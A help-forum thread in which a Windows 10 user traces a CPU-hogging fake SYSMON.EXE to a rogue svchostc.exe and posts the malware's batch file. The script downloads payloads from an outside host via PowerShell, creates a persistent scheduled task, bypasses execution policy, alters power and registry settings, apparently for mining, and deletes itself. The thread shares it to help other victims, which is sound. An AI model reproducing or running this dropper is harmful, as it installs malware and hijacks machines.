# SYSMON.EXE is taking almost half of CPU. Is it virus? //SOLVED

Tags: windows-10, task-manager

This happened after installing Visual Studio 2017. Searched everywhere and to no avail here I am.

[image: Screenshot of Task Manager]

[image: Screenshot - Location of SYSMON.EXE in TEMP]

[image: The Origin of SYSMON.EXE in Visual Studio Folder]

From Task Manager when I visit the location. It takes to TEMP folder and the whole size is about 170MB. I don't know if it is legit or not.

It says in [This Microsoft Link, It is legit](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) but still, I didn't use any command line to install it. And besides, it is not inside the windows official folder - rather inside the temp.

And even if you end the process, it automatically pops up after a while.

Update: Killing process and deleting the temp files is not working. Even uninstalled entire Visual Studio Files (20+GB) still the problem persists. I need help. Please!

**//SOLVED//**

I am keeping the thread in case someone faces the same trouble

- Find svchostc.exe (not svchost.exe) in task manager & delete it from the original location.
- Also, clean up the registry & delete temporary files from %temp%

The svchostc.exe executed the following bat files and downloaded the virus files in the temp folder and all is history.

Update: this was inside a bat file.

`ping www.google.com -n 1 -w 1000
if %errorlevel% == 1 ( exit )
if not exist "%TEMP%\7za.exe" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/7za.exe -OutFile \"%TEMP%\7za.exe\""
)
if not exist "%TEMP%\ppuarchive4.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\""
)
if not exist "%TEMP%\bcmuarchive12.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\""
)
if not exist "%TEMP%\tmg.ps1" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\""
)
if not exist "%TEMP%\opokl.txt" (
    PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\""
    PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\""
    schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F
    del "%TEMP%\svctask.xml"
    echo a > "%TEMP%\opokl.txt"
)
if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchbot.vbs -OutFile \"%TEMP%\batchbot.vbs\""
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\""
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg1x2.org/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\""
    "%TEMP%\batchinstaller.bat"
)
set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1 1D8C5463FF555789B3706E4571DD6C512B427A9F 5F72F3EFCF42EAAC871C919FA5C85C1C11FB7F6A
(for %%a in (%list%) do ( 
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90
))
powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f
if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" (
    "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y
    "%~dp0\packagenew\buildpassive.bat"
    echo d > "%LOCALAPPDATA%\svc10.17134\d.txt"
    rmdir /s /q "%~dp0\packagenew"
)
::taskkill /f /im sysmon.exe
tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL
if "%ERRORLEVEL%"=="0" exit
"%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y
"%~dp0\packagehwloc\start.bat"
start /b "" cmd /c del "%~dp0\upd.bat"&exit /b`

Comment: If you are worried, manually kill the process, then clear out your temporary folder.

Comment: Please edit the question to limit it to a specific problem with enough detail to identify an adequate answer.

Comment: @Ramhound , did that many, many times - it again fills the folder with the same files.

Comment: And is there any way to know the origin of files in the temp folder?

Comment: This problem started to happen after you installed Visual Studio. So if you uninstall Visual Studio does the problem go away?

Comment: Took me a whole day to install all the components, that's like 20GB of files, looking for alternatives. and haven't tried that.

Comment: Search your hard drive for SYSMON, see if it shows up anywhere else.

Comment: uninstalled Visual Studio, but it was not the problem. svchostc.exe (not svchost.exe) was running in the background and it was executing the above .bat files to download the virus and running powershell and commands to execute the sysmon.exe file. Deleted that (svchostc.exe) file, cleaned registry - now it's not showing up, SOLVED I guess. @Moab the files were in the %temp% folder - everytime you delete the files - it would fill up again.